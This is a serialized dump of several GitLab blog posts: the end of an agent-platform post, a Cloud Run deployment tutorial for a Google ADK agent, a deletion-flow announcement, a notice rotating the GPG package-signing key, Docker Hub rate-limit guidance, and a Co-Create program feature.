(Finish)\nDWE->>DWE: Token Revocation (if enabled)\nDWE->>DWS: Close gRPC Connection\n```\n\n\nThis diagram reveals several important architectural insights that would have taken considerable time to extract manually:\n\n* **Bidirectional communication:** The workflow executor both initiates requests and responds to service actions. 
\n* **Rich payload structure:** Each action type has specific parameters and expected responses.  \n* **Multiple integration points:** The executor interacts with local filesystem, Git repositories, and GitLab APIs.  \n* **Comprehensive action set:** Nine different action types handle everything from file operations to HTTP requests.  \n* **Proper lifecycle management:** Clear connection establishment and teardown patterns.\n\nWhat impressed me most was how the agent automatically included the detailed payload structures for each action type. This level of detail transforms the diagram from a high-level overview into actionable documentation that other developers can immediately use.\n\n## Looking ahead\n\nThis demonstration represents just one use case for GitLab Duo Agent Platform. The same contextual understanding and collaborative approach that made documentation generation seamless can be applied to:\n\n* **Code reviews:** Agents can analyze merge requests with full project context  \n* **Testing:** Generate comprehensive test suites based on actual usage patterns  \n* **Debugging:** Trace issues across multiple services and components  \n* **Security scanning:** Identify vulnerabilities with understanding of your specific architecture  \n* **CI/CD optimization:** Improve pipeline performance based on historical data\n\nGitLab Duo Agent Platform will enter public beta soon so [join the wait list today](https://about.gitlab.com/gitlab-duo/agent-platform/).\n\nStay tuned to the [GitLab Blog](https://about.gitlab.com/blog/) and social channels for additional updates. 
GitLab Duo Agent Platform is evolving rapidly with specialized agents, custom workflows, and community-driven extensions on the roadmap.\n\n## Learn more\n\n- [Agentic AI guides and resources](https://about.gitlab.com/blog/agentic-ai-guides-and-resources/)\n- [GitLab Duo Agent Platform: What’s next for intelligent DevSecOps](https://about.gitlab.com/blog/gitlab-duo-agent-platform-what-is-next-for-intelligent-devsecops/)\n- [What is agentic AI?](https://about.gitlab.com/topics/agentic-ai/)\n- [From vibe coding to agentic AI: A roadmap for technical leaders](https://about.gitlab.com/the-source/ai/from-vibe-coding-to-agentic-ai-a-roadmap-for-technical-leaders/)\n",{"content":840,"config":849},{"title":841,"description":842,"authors":843,"heroImage":845,"date":836,"body":846,"category":679,"tags":847},"Fast and secure AI agent deployment to Google Cloud with GitLab","Follow this step-by-step guide, complete with a demo application, to learn how to use agentic AI, along with GitLab's native integrations and CI/CD components.",[844],"Regnard Raquedan","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749670563/Blog/Hero%20Images/cloudcomputing.jpg","[Agentic AI](https://about.gitlab.com/topics/agentic-ai/) is transforming\nhow we build intelligent applications, but deploying AI agents securely and\nefficiently can be challenging. In this tutorial, you'll learn how to deploy\nan AI agent built with Google's Agent Development Kit\n([ADK](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-development-kit/quickstart))\nto Cloud Run using [GitLab's native\nintegrations](https://cloud.google.com/blog/topics/partners/understand-the-google-cloud-gitlab-integration)\nand [CI/CD components](https://docs.gitlab.com/ci/components/).\n\n\n## What are AI agents and why do they matter?\n\n\nAgentic AI represents a significant evolution in artificial intelligence. 
Unlike traditional generative AI tools that require constant human direction, AI agents leverage advanced language models and natural language processing to take independent action. These systems can understand requests, make decisions, and execute multistep plans to achieve goals autonomously.\n\n\nThis tutorial uses Google's ADK, a flexible and modular framework for developing and deploying AI agents. While optimized for Gemini and the Google ecosystem, ADK is model-agnostic, deployment-agnostic, and built for compatibility with other frameworks.\n\n\n## Our demo application: Canada City Advisor\n\n\nTo demonstrate the deployment process, we'll work with a practical example: the Canada City Advisor. This AI agent helps users find their ideal Canadian city based on their preferences and constraints.\n\n\nHere's how it works:\n\n\n* Users input their budget requirements and lifestyle preferences.  \n\n* The root agent coordinates two sub-agents:  \n\n  * A budget analyzer agent that evaluates financial constraints. This draws data obtained from the Canada Mortgage and Housing Corporation.  \n  * A lifestyle preferences agent that matches cities to user needs. This includes a weather service that uses [Open-Meteo](https://open-meteo.com/) to get the proper city information.  \n* The system generates personalized city recommendations\n\n\nThis multi-agent architecture showcases the power of agentic AI - different specialized agents working together to solve a complex problem. 
The sub-agents are only invoked when the root agent determines that budget and lifestyle analysis are needed.\n\n\n![Multi-agent architecture to develop demo application with agentic AI](https://res.cloudinary.com/about-gitlab-com/image/upload/v1751576568/obgxpxvlnxtzifddrrz1.png)\n\n\n## Prerequisites\n\n\nBefore we begin, ensure you have:\n\n\n* A Google Cloud project with the following APIs enabled:  \n\n  * Cloud Run API  \n  * Artifact Registry API  \n  * Vertex AI API  \n* A GitLab project for your source code  \n\n* Appropriate permissions in both GitLab and Google Cloud\n\n\n**Step 1: Set up IAM integration with Workload Identity Federation**\n\n\nThe first step establishes secure, keyless authentication between GitLab and Google Cloud using [Workload Identity Federation](https://cloud.google.com/iam/docs/workload-identity-federation). This eliminates the need for service account keys and improves security.\n\n\nIn your GitLab project:\n\n\n1. Navigate to **Settings > Integrations > Google Cloud IAM.**  \n\n2. Provide the following information:  \n\n   * **Project ID**: Your Google Cloud project ID  \n   * **Project Number**: Found in your Google Cloud console  \n   * **Pool ID**: A unique identifier for your workload identity pool  \n   * **Provider ID**: A unique identifier for your identity provider\n\nGitLab will generate a script for you. Copy this script and run it in your Google Cloud Shell to create the Workload Identity Federation.\n\n\n**Step 2: Configure Google Artifact Registry integration**\n\n\nNext, we'll set up the connection to Google Artifact Registry where our container images will be stored.\n\n\n1. In GitLab, go to **Settings > Integrations > Google Artifact Registry.**  \n\n2. 
Enter:  \n\n   * **Google Cloud Project ID**: Same as in Step 1  \n   * **Repository Name**: Name of an existing Artifact Registry repository  \n   * **Location**: The region where your repository is located\n\n**Important**: The repository must already exist in Artifact Registry. GitLab won't create a new one for you in this context.\n\n\nGitLab will generate commands to set up the necessary permissions. Run these in Google Cloud Shell.\n\n\nAdditionally, add these roles to your service principal for Cloud Run deployment:\n\n\n* `roles/run.admin`  \n\n* `roles/iam.serviceAccountUser`  \n\n* `roles/cloudbuild.builds.editor`\n\n\nYou can add these roles using the following gcloud commands:\n\n\n```shell\n\nGCP_PROJECT_ID=\"\u003Cyour-project-id>\" #replace\n\nGCP_PROJECT_NUMBER=\"\u003Cyour-project-number>\" #replace\n\nGCP_WORKLOAD_IDENTITY_POOL=\"\u003Cyour-pool-id>\" #replace\n\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/run.admin'\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/iam.serviceAccountUser'\n\ngcloud projects add-iam-policy-binding ${GCP_PROJECT_ID} \\\n  --member=\"principalSet://iam.googleapis.com/projects/${GCP_PROJECT_NUMBER}/locations/global/workloadIdentityPools/${GCP_WORKLOAD_IDENTITY_POOL}/attribute.developer_access/true\" \\\n  --role='roles/cloudbuild.builds.editor'\n```\n\n\n**Step 3: Create the CI/CD pipeline**\n\n\nNow for the exciting part – let's build our deployment pipeline! 
GitLab's CI/CD components make this remarkably simple.\n\n\nCreate a `.gitlab-ci.yml` file in your project root:\n\n\n```unset\n\nstages:\n  - build\n  - test\n  - upload\n  - deploy\n\nvariables:\n  GITLAB_IMAGE: $CI_REGISTRY_IMAGE/main:$CI_COMMIT_SHORT_SHA\n  AR_IMAGE: $GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_LOCATION-docker.pkg.dev/$GOOGLE_ARTIFACT_REGISTRY_PROJECT_ID/$GOOGLE_ARTIFACT_REGISTRY_REPOSITORY_NAME/main:$CI_COMMIT_SHORT_SHA\n\nbuild:\n  image: docker:24.0.5\n  stage: build\n  services:\n    - docker:24.0.5-dind\n  before_script:\n    - docker login -u $CI_REGISTRY_USER -p $CI_REGISTRY_PASSWORD $CI_REGISTRY\n  script:\n    - docker build -t $GITLAB_IMAGE .\n    - docker push $GITLAB_IMAGE\n\ninclude:\n  - template: Jobs/Dependency-Scanning.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Dependency-Scanning.gitlab-ci.yml\n  - template: Jobs/SAST.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/SAST.gitlab-ci.yml\n  - template: Jobs/Secret-Detection.gitlab-ci.yml  # https://gitlab.com/gitlab-org/gitlab/blob/master/lib/gitlab/ci/templates/Jobs/Secret-Detection.gitlab-ci.yml\n  - component: gitlab.com/google-gitlab-components/artifact-registry/upload-artifact-registry@main\n    inputs:\n      stage: upload\n      source: $GITLAB_IMAGE\n      target: $AR_IMAGE\n  - component: gitlab.com/google-gitlab-components/cloud-run/deploy-cloud-run@main\n    inputs:\n      stage: deploy\n      project_id: \"\u003Cyour-project-id>\" #replace\n      service: \"canadian-city\"\n      region: \"us-central1\"\n      image: $AR_IMAGE\n```\n\n\nThe pipeline consists of four stages:\n\n\n1. **Build**: Creates the Docker container with your AI agent  \n\n2. **Test**: Runs security scans (container scanning, dependency scanning, SAST)  \n\n3. **Upload**: Pushes the container to Artifact Registry  \n\n4. 
**Deploy**: Deploys to Cloud Run\n\n\nThe great thing about using [GitLab's CI/CD components](https://docs.gitlab.com/ci/components/) is that you only need to provide a few parameters - the components handle all the complex authentication and deployment logic.\n\n\n**Step 4: Deploy and test**\n\n\nWith everything configured, it's time to deploy:\n\n\n1. Commit your code and `.gitlab-ci.yml` to your GitLab repository.  \n\n2. The pipeline will automatically trigger.  \n\n3. Monitor the pipeline progress in GitLab's CI/CD interface.  \n\n4. Once complete, find your Cloud Run URL in the Google Cloud Console.\n\n\nYou'll see each stage execute:\n\n\n* Build stage creates your container.  \n\n* Test stage runs comprehensive security scans.  \n\n* Upload stage pushes to Artifact Registry.  \n\n* Deploy stage creates or updates your Cloud Run service.\n\n\n## Security benefits\n\n\nThis approach provides several security advantages:\n\n\n* **No long-lived credentials:** Workload Identity Federation eliminates service account keys.  \n\n* **Automated security scanning:** Every deployment is scanned for vulnerabilities.  \n\n* **Audit trail:** Complete visibility of who deployed what and when.  \n\n* **Principle of least privilege:** Fine-grained IAM roles limit access.\n\n\n## Summary\n\nBy combining GitLab's security features with Google Cloud's powerful AI and serverless platforms, you can deploy AI agents that are both secure and scalable. The integration between GitLab and Google Cloud eliminates much of the complexity traditionally associated with such deployments.\n\n> Use this tutorial's [complete code\nexample](https://gitlab.com/gitlab-partners-public/google-cloud/demos/ai-agent-deployment)\nto get started now. Not a GitLab customer yet? 
Explore the DevSecOps platform with [a free trial](https://about.gitlab.com/free-trial/).\n",[675,848,786],"google",{"featured":6,"template":789,"slug":850},"fast-and-secure-ai-agent-deployment-to-google-cloud-with-gitlab",{"category":687,"slug":691,"posts":852},[853,865,876],{"content":854,"config":863},{"title":855,"description":856,"authors":857,"heroImage":859,"date":860,"body":861,"category":691,"tags":862},"Improving GitLab's deletion flow: What to expect in coming months","GitLab is enhancing its deletion flow for groups and projects with features like pending deletion, self-service recovery, and an extended 30-day recovery window. Here's what you need to know.\n",[858],"Christina Lohr","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749663000/Blog/Hero%20Images/tanukilifecycle.png","2025-07-14","At GitLab, we're committed to continuously improving your experience across our platform. Today, we're excited to announce significant enhancements to our deletion flow for groups and projects. We are rolling out a series of improvements designed to protect your data, simplify recovery, and create a more intuitive experience across all pricing tiers.\n\n## Why we're making these changes\n\nOur current deletion flow has some inconsistencies that can lead to frustrating experiences. Free tier users have had limited or no options for recovering accidentally deleted content, projects in personal namespaces haven't had the same protections as those in groups, and group namespace paths have remained locked after deletion, preventing immediate reuse.\n\nWe've heard your feedback, and we're addressing these pain points with a comprehensive redesign of our deletion flow that will be rolled out in multiple iterations.\n\n## What has changed already\n\nOver the past quarter, we have implemented fundamental improvements to create a consistent deletion experience across all pricing tiers. 
These changes have eliminated the frustration of accidentally deleting important content with no recovery option.\n\n* [**Pending deletion for all users**](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#deletion-protection-available-for-all-users)**:** All deleted projects and groups now enter a \"pending deletion\" state before being permanently deleted, regardless of their pricing tier.  \n* [**Self-service recovery**](https://about.gitlab.com/releases/2025/05/15/gitlab-18-0-released/#delayed-project-deletion-for-user-namespaces)**:** You can now restore your own content without contacting support, giving you more control and autonomy over your data.  \n* [**Clear status indicators**](https://gitlab.com/gitlab-org/gitlab/-/issues/502234)**:** We have standardized how deletion status is displayed across the platform, making it immediately clear when content is pending deletion.  \n* **Extended recovery window:** On July 10, 2025, we increased the pending deletion period from 7 to 30 days on GitLab.com. This means you now have ample time to recover from accidental deletions.\n\n## What's coming next\n\n### Currently in development\n\nBuilding on the foundation established in our first iteration, we are further enhancing your deletion experience with two key improvements:\n\n* [**Admin area consistency**](https://gitlab.com/groups/gitlab-org/-/epics/17372)**:** Deletions initiated from the Admin area will follow the same pending deletion process as deletions initiated directly from the group or project level, creating a unified experience across all access points.  \n* [**Immediate path reuse**](https://gitlab.com/gitlab-org/gitlab/-/issues/526081)**:** When you delete a project or group, its namespace path will be automatically renamed, allowing you to immediately reuse the original path for new content. 
This will remove the waiting period currently required to reuse namespace paths.\n\n### Planned for future release\n\nThe final phase will introduce a redesigned deletion experience that completes our vision for a modern, intuitive deletion system:\n\n* **Centralized \"Trash\" interface:** All your deleted content will be accessible in a dedicated \"Trash\" section, providing a familiar paradigm similar to what you're used to in other applications.  \n* [**Clear action separation**](https://gitlab.com/gitlab-org/gitlab/-/issues/541182)**:** We will create a clear distinction between \"Delete\" (temporary, recoverable) and \"Delete Permanently\" (irrevocable) actions to prevent accidental data loss.  \n* **Bulk management:** You'll be able to restore or permanently delete multiple items at once, making cleanup and recovery more efficient.\n\n## How these changes benefit you\n\nThese enhancements deliver several key benefits that will transform your experience with GitLab's deletion functionality.\n\n* **Protection against data loss** is provided through pending deletion and self-service recovery available across all tiers, giving you a safety net against accidental deletions. The **consistent experience** ensures the same deletion flow applies to all projects and groups, eliminating inconsistencies across the platform.\n\n* You'll gain **greater control** through enhanced visibility and management options for deleted content, with a familiar interface that makes recovery intuitive. **Improved workflow** efficiency will result from immediate path reuse and bulk management capabilities that streamline your content organization process.\n\n* Most importantly, you'll have **peace of mind** knowing that the extended 30-day recovery window ensures ample opportunity to recover important data, while the clear separation between temporary and permanent deletion actions prevents accidental data loss.\n\n## Your feedback matters\n\nAs always, we value your input. 
Please leave feedback in [the feedback issue](https://gitlab.com/gitlab-org/gitlab/-/issues/538165).",[757],{"featured":6,"template":789,"slug":864},"improving-gitlab-deletion-flow-what-to-expect-in-coming-months",{"content":866,"config":874},{"title":867,"description":868,"authors":869,"heroImage":859,"date":871,"body":872,"category":691,"tags":873},"GitLab rotating Omnibus Linux package signing key","Learn who is impacted by the rotation of the GNU Privacy Guard (GPG) key and what you need to know.",[870],"GitLab","2025-04-16","As part of our standard security practices, GitLab is rotating the GNU Privacy Guard (GPG) key used to sign all Omnibus Linux packages on April 16, 2025. This key ensures the integrity of our packages, verifying that they have not been tampered with after creation in our CI pipelines. This key is distinct from the repository metadata signing key used by package managers and the GPG signing key for the GitLab Runner. GitLab is revoking the existing key and will begin signing upcoming packages using a new key with fingerprint `98BF DB87 FCF1 0076 416C 1E0B AD99 7ACC 82DD 593D`.\n\n**What do I need to do?**\n\nIf you currently validate the GPG signatures of GitLab Omnibus packages, you will need to update your copy of the package signing key. Packages published before this article will remain signed with the previous key.\n\nThe package signing key is separate from the repository metadata signing key used by your operating system’s package managers (like `apt` or `yum`). 
Unless you are specifically verifying package signatures or have configured your package manager to verify the package signatures, no action is required to continue installing GitLab Omnibus packages.\n\n**Where can I find the new key?**\n\nThe new key can be downloaded from `packages.gitlab.com` using the URL:\n\n[https://packages.gitlab.com/gitlab/gitlab-ee/gpgkey/gitlab-gitlab-ee-CB947AD886C8E8FD.pub.gpg](https://packages.gitlab.com/gitlab/gitlab-ee/gpgkey/gitlab-gitlab-ee-CB947AD886C8E8FD.pub.gpg)\n\nPlease check the documentation for more information concerning [verification of the package signatures](https://docs.gitlab.com/omnibus/update/package_signatures#package-signatures).\n\n**What do I do if I still have problems?**\n\nPlease open an issue in the [omnibus-gitlab issue tracker](https://gitlab.com/gitlab-org/omnibus-gitlab/-/issues/new?issue&issuable_template=Bug).",[475,757,767],{"slug":875,"featured":6,"template":789},"gitlab-rotating-omnibus-linux-package-signing-key",{"content":877,"config":885},{"title":878,"description":879,"authors":880,"heroImage":807,"date":882,"body":883,"category":691,"tags":884},"Prepare now: Docker Hub rate limits will impact GitLab CI/CD","Learn how Docker Hub's upcoming pull rate limits will affect GitLab pipelines and what you can do to avoid disruptions.",[881],"Tim Rizzi","2025-03-24","On April 1, 2025, Docker will implement new [pull rate limits](https://docs.docker.com/docker-hub/usage/) to Docker Hub that may significantly impact CI/CD pipelines across the industry, including those running on GitLab. 
The most significant change is the 100 pulls-per-6-hours limit for unauthenticated users.\n\n## What's changing?\n\nStarting April 1, Docker will enforce the following pull rate limits:\n\n| User type | Pull rate limit per hour | Number of public repositories | Number of private repositories |\n|-----------|--------------------------|-------------------------------|--------------------------------|\n| Business, Team, Pro (authenticated) | Unlimited (fair use) | Unlimited | Unlimited |\n| Personal (authenticated) | 200 per 6-hour window | Unlimited | Up to 1 |\n| Unauthenticated users | 100 per 6-hour window per IPv4 address or IPv6 /64 subnet | Not applicable | Not applicable |\n\n\u003Cp>\u003C/p>\nThis is particularly important because:\n\n* GitLab's Dependency Proxy currently pulls from Docker Hub as an unauthenticated user.\n* Most CI/CD pipelines that don't use the Dependency Proxy pull directly from Docker Hub as unauthenticated users.\n* On hosted runners for GitLab.com, multiple users might share the same IP address or subnet, making them collectively subject to this limit.\n\n## How this impacts GitLab users\n\n**Impact on direct Docker Hub pulls**\n\nIf your CI/CD pipelines directly pull images from Docker Hub without authentication, they will be limited to 100 pulls per six-hour window per IP address. For pipelines that run frequently or across multiple projects sharing the same runner infrastructure, this will quickly exhaust the limit and cause pipeline failures.\n\n**Impact on GitLab Dependency Proxy**\n\nThe GitLab Dependency Proxy feature allows you to cache Docker images within GitLab to speed up pipelines and reduce external dependencies. 
However, the current implementation pulls from Docker Hub as an unauthenticated user, meaning it will also be subject to the 100 pulls-per-6-hours limit.\n\n**Impact on hosted runners**\n\nFor hosted runners on GitLab.com, we use [Google Cloud's pull-through cache](https://cloud.google.com/artifact-registry/docs/pull-cached-dockerhub-images). This mirrors the commonly pulled images and allows us to avoid rate limits. Job images defined as `image:` or `services:` in your `.gitlab-ci.yml` file are not affected by rate limits.\n\nThings are slightly more challenging whenever images are pulled within the runner environment. The most common use case to pull images during runner runtime is to build an image using Docker-in-Docker or Kaniko. In this scenario, the Docker Hub image defined in your `Dockerfile` is pulled directly from Docker Hub and is likely to be affected by rate limits.\n\n## How GitLab is responding\n\nWe're actively working on solutions to mitigate these challenges:\n\n* **Dependency Proxy authentication:** We've added support for Docker Hub authentication in the [GitLab Dependency Proxy feature](https://gitlab.com/gitlab-org/gitlab/-/issues/331741). 
This will allow the Dependency Proxy to pull images from Docker Hub as an authenticated user, significantly increasing the rate limits.\n* **Documentation updates:** We've updated our [documentation](https://docs.gitlab.com/user/packages/dependency_proxy/#configure-credentials) to provide clear guidance on configuring pipeline authentication for Docker Hub.\n* **Internal infrastructure preparation:** We're preparing our internal infrastructure to minimize the impact on hosted runners for GitLab.com.\n\n## How you can prepare\n\n**Option 1: Configure Docker Hub authentication in your pipelines**\n\nFor pipelines that pull directly from Docker Hub, you can configure authentication to increase your rate limit to 200 pulls per six-hour window (or unlimited with a paid Docker Hub subscription).\n\nAdd Docker Hub credentials to your project or group CI/CD variables (not in your `.gitlab-ci.yml` file). Please refer to our [documentation on using Docker images](https://docs.gitlab.com/ci/docker/using_docker_images/#use-statically-defined-credentials) for detailed instructions on setting up the `DOCKER_AUTH_CONFIG` CI/CD variable correctly.\n\n**Option 2: Use the GitLab Container Registry**\n\nConsider pushing your frequently used Docker images to your [GitLab Container Registry](https://docs.gitlab.com/user/packages/container_registry/). This eliminates the need to pull from Docker Hub during CI/CD runs:\n\n1. Pull the image from Docker Hub.\n2. Tag it for your GitLab Container Registry.\n3. Push it to your GitLab Container Registry.\n4. 
Update your pipelines to pull from GitLab Container Registry.\n\n```\ndocker pull busybox:latest\ndocker tag busybox:latest $CI_REGISTRY_IMAGE/busybox:latest\ndocker push $CI_REGISTRY_IMAGE/busybox:latest\n```\n\nThen in your `.gitlab-ci.yml`:\n\n`image: $CI_REGISTRY_IMAGE/busybox:latest`\n\n**Option 3: Use GitLab Dependency Proxy**\n\nGitLab's Dependency Proxy feature provides a way to cache and proxy Docker images, reducing external dependencies and rate limit issues.\n\nCurrent authentication options:\n* GitLab 17.10: Configure Docker Hub authentication for the Dependency Proxy using [GraphQL API](https://docs.gitlab.com/user/packages/dependency_proxy/#configure-credentials-using-the-graphql-api)\n* GitLab 17.11: Use the new UI-based configuration in your group's settings (already available on GitLab.com)\n\nOnce authentication is properly configured, you can:\n\n1. Configure Docker Hub credentials in your group's Dependency Proxy settings:\n  - For GitLab 17.11+ (or current GitLab.com): Navigate to your group's settings > Packages & Registries > Dependency Proxy.\n  - For GitLab 17.10: Use the GraphQL API to configure authentication.\n2. 
Update your pipelines to use the Dependency Proxy URLs in your CI/CD configuration:\n`image: ${CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX}/busybox:latest`\n\n**Option 4: Consider a Docker Hub paid subscription**\n\nFor organizations with heavy Docker Hub usage, upgrading to a paid Docker subscription (Team or Business) will provide unlimited pulls, which may be the most straightforward solution.\n\n## Best practices to reduce Docker Hub rate limit impact\n\nRegardless of which option you choose, consider these best practices to minimize Docker Hub rate limit impact:\n\n* Use specific image tags instead of `latest` to avoid unnecessary pulls.\n* Consolidate your Docker files to use the same base images across projects.\n* Schedule less critical pipelines to run outside of peak hours.\n* Use caching effectively to avoid pulling the same images repeatedly.\n\n**Note:** According to Docker Hub [documentation](https://docs.docker.com/docker-hub/usage/pulls/#pull-definition), the pull count is incremented when pulling the image manifest, not based on image size or number of layers.\n\n## Timeline and next steps\n\n**Now**\n  * Implement authentication for direct Docker Hub pulls.\n  * GitLab.com users can already configure Docker Hub authentication for the Dependency Proxy using either:\n    * The GraphQL API, or\n    * The UI in group settings\n  * Self-managed GitLab 17.10 users can configure Dependency Proxy authentication using the GraphQL API.\n\n**April 1, 2025**\n  * Docker Hub rate limits go into effect.\n\n**April 17, 2025**\n  * GitLab 17.11 will be released with UI-based Dependency Proxy authentication support for self-managed instances. \n\nWe recommend taking action well before the April 1 deadline to avoid unexpected pipeline failures. For most users, configuring the Dependency Proxy with Docker Hub authentication is the most efficient long-term solution.\n\n> Have questions or need implementation help? 
Please visit [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/526605) where our team is actively providing support.",[109,736,475],{"slug":886,"featured":91,"template":789},"prepare-now-docker-hub-rate-limits-will-impact-gitlab-ci-cd",{"category":698,"slug":702,"posts":888},[889,904,915],{"content":890,"config":902},{"title":891,"description":892,"authors":893,"heroImage":895,"date":896,"body":897,"category":702,"tags":898},"The Co-Create Program: How customers are collaborating to build GitLab","Learn how organizations like Thales, Scania, and Kitware are partnering with GitLab engineers to contribute meaningful features that benefit the entire community.",[894],"Fatima Sarah Khalid","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749659756/Blog/Hero%20Images/REFERENCE_-_display_preview_for_blog_images.png","2025-01-30","This past year, over 800 community members have made more than 3,000 contributions to GitLab. These contributors include team members from global organizations like Thales, Scania, and Kitware, who are helping shape GitLab's future through the [Co-Create Program](https://about.gitlab.com/community/co-create/) — GitLab's collaborative development program where customers work directly with GitLab engineers to contribute meaningful features to the platform.\n\nThrough workshops, pair programming sessions, and ongoing support, program participants get hands-on experience with GitLab's architecture and codebase while solving issues or improving existing features.\n\n\"Our experience with the Co-Create Program has been incredible,\" explains Sébastien Lejeune, open source advocate at Thales. 
\"It only took two months between discussing our contribution with a GitLab Contributor Success Engineer and getting it live in the GitLab release.\"\n\nIn this post, we'll explore how customers have leveraged the Co-Create Program to turn their ideas into code, learning and contributing along the way.\n\n## The Co-Create experience\n[The GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit) helps contributors get started developing on GitLab. \"The advice I would give new contributors is to remember that you can't break anything with the GDK,\" says Hook. \"If you make a change and it doesn't work, you can undo it or start again. The beauty of GDK is that you can tinker, test, and learn without worrying about the environment.\"\n\nEach participating organization in the Co-Create Program receives support throughout their contribution journey:\n\n- __Technical onboarding workshop__: A dedicated session to set up the GitLab Development Kit (GDK) and understand GitLab's architecture\n- __1:1 engineering support__: Access to GitLab engineers for pair programming and technical guidance\n- __Architecture deep dives__: Focused sessions on specific GitLab components relevant to the issue the organization is contributing to\n- __Code review support__: Detailed feedback and guidance through the merge request process\n- __Regular check-ins__: Ongoing collaboration to ensure progress and address any challenges\n\nThis structure ensures that teams can contribute effectively, regardless of their prior experience with GitLab's codebase or the Ruby/Go programming language. As John Parent from Kitware notes, \"If you've never seen or worked with GitLab before, you're staring at a sophisticated architecture and so much code across different projects. 
The Co-Create Program helps distill what would take weeks of internal training into a targeted crash course.\"\n\nThe result is a program that not only helps deliver new features but also builds lasting relationships between GitLab and its user community. \"It's inspiring for our engineers to see the passion our customers bring to contributing to and building GitLab together,\" shares Shekhar Patnaik, principal engineer at GitLab. \"Customers get to see the 'GitLab way,' and engineers get to witness their commitment to shaping the future of GitLab.\"\n\n## Enhancing project UX with Thales\nWhen Thales identified opportunities to improve GitLab's empty project UI, they didn't just file a feature request — they built the solution themselves. Their contributions focused on streamlining the new project setup experience by simplifying SSH/HTTPS configuration with a tabbed interface and adding copy/paste functionality for the code snippets. These changes had a significant impact on developer workflows.\n\nThe team's impact extended beyond the UX improvements. Quentin Michaud, PhD fellow for cloud applications on the edge at Thales, contributed to improving the GitLab Development Kit (GDK). As a package maintainer for Arch Linux, Michaud's expertise helped improve GDK's documentation and support its containerization efforts, making it easier for future contributors to get started.\n\n\"My open source experience helped me troubleshoot GDK's support for Linux distros,” says Michaud. “While improving package versioning documentation, I saw that GitLab's Contributor Success team was also working to set up GDK into a container. 
Seeing our efforts converge was a great moment for me — it showed how open source collaboration can help build better solutions.\"\n\nThe positive experience for the Thales team means that Lejeune now uses the Co-Create Program as \"a powerful example to show our managers the return on investment from open source contributions.\"\n\n## Advancing package support with Scania\nWhen Scania needed advanced package support in GitLab, they saw an opportunity to contribute and build it themselves. \n\n\"As long-time GitLab users who actively promote open source within our organization, the Co-Create Program gave us a meaningful way to contribute directly to open source,\" shares Puttaraju Venugopal Hassan, solution architect at Scania.\n\nThe team started with smaller changes to familiarize themselves with the codebase and review process, then progressed to larger features. \"One of the most rewarding aspects of the Co-Create Program has been looking back at the full, end-to-end process and seeing how far we've come,\" reflects Océane Legrand, software developer at Scania. \"We started with discovery and smaller changes, but we took on larger tasks over time. It's great to see that progression.\" \n\nTheir contributions include bug fixes for the package registry and efforts to enhance the Conan package registry feature set, bringing it closer to general availability (GA) readiness while implementing Conan version 2 support. Their work and collaboration with GitLab demonstrates how the Co-Create Program can drive significant improvements to GitLab’s package registry capabilities.\n\n\"From the start, our experience with the Co-Create Program was very organized. We had training sessions that guided us through everything we needed to contribute. One-on-one sessions with a GitLab engineer also gave us an in-depth look at GitLab’s package architecture, which made the contribution process much smoother,\" said Juan Pablo Gonzalez, software developer at Scania. 
\n\nThe impact of the program goes beyond code — program participants are also building valuable skills as a direct result of their contributions. In [the GitLab 17.8 release](https://about.gitlab.com/releases/2025/01/16/gitlab-17-8-released/#mvp), both Legrand and Gonzalez were recognized as GitLab MVPs. Legrand talked about how the work she's doing in open source impacts both GitLab and Scania, including building new skills for her and her team: \"Contributing through the Co-Create Program has given me new skills, like experience with Ruby and background migrations. When my team at Scania faced an issue during an upgrade, I was able to help troubleshoot because I'd already encountered it through the Co-Create Program.\"\n\n## Optimizing authentication for high-performance computing with Kitware\nKitware brought specialized expertise from their work with national laboratories to improve GitLab's authentication framework. Their contributions included adding support for the OAuth2 device authorization grant flow in GitLab, as well as implementing new database tables, controllers, views, and documentation. This contribution enhances GitLab's authentication options, making it more versatile for devices without browsers or with limited input capabilities.\n\n\"The Co-Create Program is the most efficient and effective way to contribute to GitLab as an external contributor,\" shares John Parent, R&D engineer at Kitware. \"Through developer pairing sessions, we found better implementations that we might have missed working alone.\"\n\nAs a long-time open source contributor, Kitware particularly appreciated GitLab's approach to development. \"I assumed GitLab wouldn't rely on out-of-the-box solutions at its scale, but seeing them incorporate a Ruby dependency instead of building a custom in-house solution was great,” says Parent. 
“Coming from the C++ world, where package managers are rare, it was refreshing to see this approach and how straightforward it could be.\"\n\n## Building better together: Benefits of Co-Create\nThe Co-Create Program creates value that flows both ways. \"The program bridges a gap between us as GitLab engineers and our customers,\" explains Imre Farkas, staff backend engineer at GitLab. \"As we work with them, we hear their day-to-day challenges, the parts of GitLab they rely on, and where improvements can be made. It's great to see how enthusiastic they are about getting involved in building GitLab with us.\"\n\nThis collaborative approach also accelerates GitLab's development. As Shekhar Patnaik, principal engineer at GitLab, observes: \"Through Co-Create, our customers are helping us move our roadmap forward. Their contributions allow us to deliver critical features faster, benefitting our entire user base. As the program scales, there's a real potential to accelerate development on our most impactful features by working alongside the very people who rely on them.\"\n\n## Get started with Co-Create\nReady to turn your feature requests into reality? 
